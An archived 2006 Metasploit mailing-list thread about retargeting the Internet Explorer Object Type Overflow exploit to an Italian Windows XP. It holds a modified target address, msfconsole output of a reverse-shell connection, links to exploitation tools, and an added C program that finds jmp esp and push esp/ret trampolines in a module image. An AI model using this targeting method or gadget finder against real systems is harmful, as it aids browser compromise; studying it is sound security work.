Metasploit mailing list archives
Internet Explorer Object Type Overflow
From: jerome.athias at free.fr (Jerome Athias)
Date: Wed, 31 May 2006 11:45:20 +0200
Hi,

you can find some useful addresses here: https://www.securinfos.info/international-opcodes/index.php

also you can use this tool: https://www.securinfos.info/outils-securite-hacking/Findjmp2.zip

and an example of exploitation on the Windows platform: http://www.hackingdefined.com/index.php/Savant_Buffer_Overflow

/JA

Angelo Dell'Aera wrote:
Hello,

first of all I have to say I'm not a real expert in the Windows world. While trying to exploit the Internet Explorer Object Type Overflow on a host running Windows XP Professional SP1 through Metasploit, I realized that the ws2_32 push esp/ret (which is located at 0x71ab1d54 for the English version) is located at 0x71a31d54 for the Italian version, thus I modified ie_objecttype.pm this way:

"Windows XP" => [ 0x71a31d54, 0x7ffdec50 ], # ws2_32 push esp/ret SP0/1

When I tried to exploit the vulnerable host I saw IE crashing, and on the attacker's side this behavior:

msf ie_objecttype(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.33.162:8080 ...
[*] HTTP Client connected from 192.168.33.107:1392 using Windows XP, sending payload...
[*] Got connection from 192.168.33.162:4321 <-> 192.168.33.107:1393
[*] Exiting Reverse Handler.

I tried attaching iexplore.exe with OllyDbg and observed an access violation when writing to the address 0x77e40000 (this address is in ECX and EBX when the access violation is triggered). I suppose I'll need to modify even the second address in the target array in order to exit in a clean way, but I'm really not skilled in the Windows world, and so hints about how to do it are really welcome.

Regards,
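The thread above turns on finding a "push esp / ret" trampoline in a locale-specific build of ws2_32.dll, which is what Findjmp2 and the international-opcodes list automate. The two addresses quoted on the page, 0x71ab1d54 and 0x71a31d54, differ by exactly 0x80000, which is what you would expect when the same module offset is loaded at a different base. The following C program is an added example written for this archive page; it is not code from either poster, from Findjmp2, or from Metasploit. It scans a byte image for the x86 encodings of push esp; ret (54 C3), jmp esp (FF E4) and call esp (FF D4), converts each hit to a virtual address for a given load base, and flags addresses containing bytes that commonly break string-based overflows. The module image is constructed inline (zeros with three planted opcode pairs, one of them at offset 0x1d54 so that the page's two addresses fall out of the two bases); the bad-byte set (0x00, 0x0a, 0x0d) is an assumption and depends on the bug being exploited. Nothing here addresses the second target-array address (0x7ffdec50) that Angelo asks about.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* x86 opcode sequences usable as a trampoline into a stack-resident payload. */
typedef struct {
    const char *name;
    const uint8_t *bytes;
    size_t len;
} opcode_pattern;

static const uint8_t PUSH_ESP_RET[] = { 0x54, 0xC3 }; /* push esp ; ret  */
static const uint8_t JMP_ESP[]      = { 0xFF, 0xE4 }; /* jmp esp         */
static const uint8_t CALL_ESP[]     = { 0xFF, 0xD4 }; /* call esp        */

static const opcode_pattern PATTERNS[] = {
    { "push esp; ret", PUSH_ESP_RET, sizeof PUSH_ESP_RET },
    { "jmp esp",       JMP_ESP,      sizeof JMP_ESP },
    { "call esp",      CALL_ESP,     sizeof CALL_ESP },
};

typedef struct {
    uint32_t addr;     /* base + offset of the opcode pair */
    const char *name;  /* which pattern matched */
    int bad;           /* non-zero if addr contains a byte from the bad-byte set */
} hit;

/* Assumed bad-byte set: NUL, LF, CR. Adjust for the bug's actual constraints. */
static int has_bad_byte(uint32_t addr) {
    for (int i = 0; i < 4; i++) {
        uint8_t b = (uint8_t)(addr >> (8 * i));
        if (b == 0x00 || b == 0x0A || b == 0x0D) return 1;
    }
    return 0;
}

/* Scan `image` (a module's bytes as mapped at `base`) for trampoline patterns.
   Writes up to `max_hits` results into `out`; returns the number found. */
size_t find_trampolines(const uint8_t *image, size_t size, uint32_t base,
                        hit *out, size_t max_hits) {
    size_t n = 0;
    for (size_t off = 0; off < size && n < max_hits; off++) {
        for (size_t p = 0; p < sizeof PATTERNS / sizeof PATTERNS[0]; p++) {
            const opcode_pattern *pat = &PATTERNS[p];
            if (off + pat->len <= size &&
                memcmp(image + off, pat->bytes, pat->len) == 0) {
                out[n].addr = base + (uint32_t)off;
                out[n].name = pat->name;
                out[n].bad  = has_bad_byte(out[n].addr);
                n++;
                break;
            }
        }
    }
    return n;
}

/* Constructed stand-in for a real DLL image: zeros plus three planted pairs.
   The push esp/ret sits at offset 0x1d54, matching the offset implied by the
   two ws2_32 addresses quoted in the thread. */
void build_sample_image(uint8_t *buf, size_t size) {
    memset(buf, 0, size);
    if (size < 0x1d56) return;
    buf[0x0101] = 0xFF; buf[0x0102] = 0xE4;  /* jmp esp  (clean address)      */
    buf[0x0a11] = 0xFF; buf[0x0a12] = 0xD4;  /* call esp (address contains 0x0a) */
    buf[0x1d54] = 0x54; buf[0x1d55] = 0xC3;  /* push esp ; ret                */
}

/* First clean push esp/ret address for a module loaded at `base`, or 0. */
uint32_t push_esp_ret_address(uint32_t base) {
    uint8_t image[0x2000];
    hit hits[8];
    build_sample_image(image, sizeof image);
    size_t n = find_trampolines(image, sizeof image, base, hits, 8);
    for (size_t i = 0; i < n; i++)
        if (strcmp(hits[i].name, "push esp; ret") == 0 && !hits[i].bad)
            return hits[i].addr;
    return 0;
}

int main(void) {
    /* Same image, two load bases: the English and Italian bases implied by
       0x71ab1d54 and 0x71a31d54 (assumed 0x71ab0000 and 0x71a30000). */
    const uint32_t bases[] = { 0x71ab0000u, 0x71a30000u };
    uint8_t image[0x2000];
    hit hits[8];
    build_sample_image(image, sizeof image);
    for (size_t b = 0; b < 2; b++) {
        size_t n = find_trampolines(image, sizeof image, bases[b], hits, 8);
        printf("base 0x%08x: %zu hit(s)\n", bases[b], n);
        for (size_t i = 0; i < n; i++)
            printf("  0x%08x  %-14s %s\n", hits[i].addr, hits[i].name,
                   hits[i].bad ? "(bad byte)" : "");
    }
    return 0;
}
```

Run against a real module, the image would come from the DLL as mapped in the target process (or from the file with section offsets translated to RVAs), and the base from the target's module list; the point of scanning per-locale builds is that the RVA of a usable gadget is only stable across copies of the same binary, so an English address cannot be assumed to hold on an Italian install.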
Current thread:
- Internet Explorer Object Type Overflow Angelo Dell'Aera (May 31)
- Internet Explorer Object Type Overflow Jerome Athias (May 31)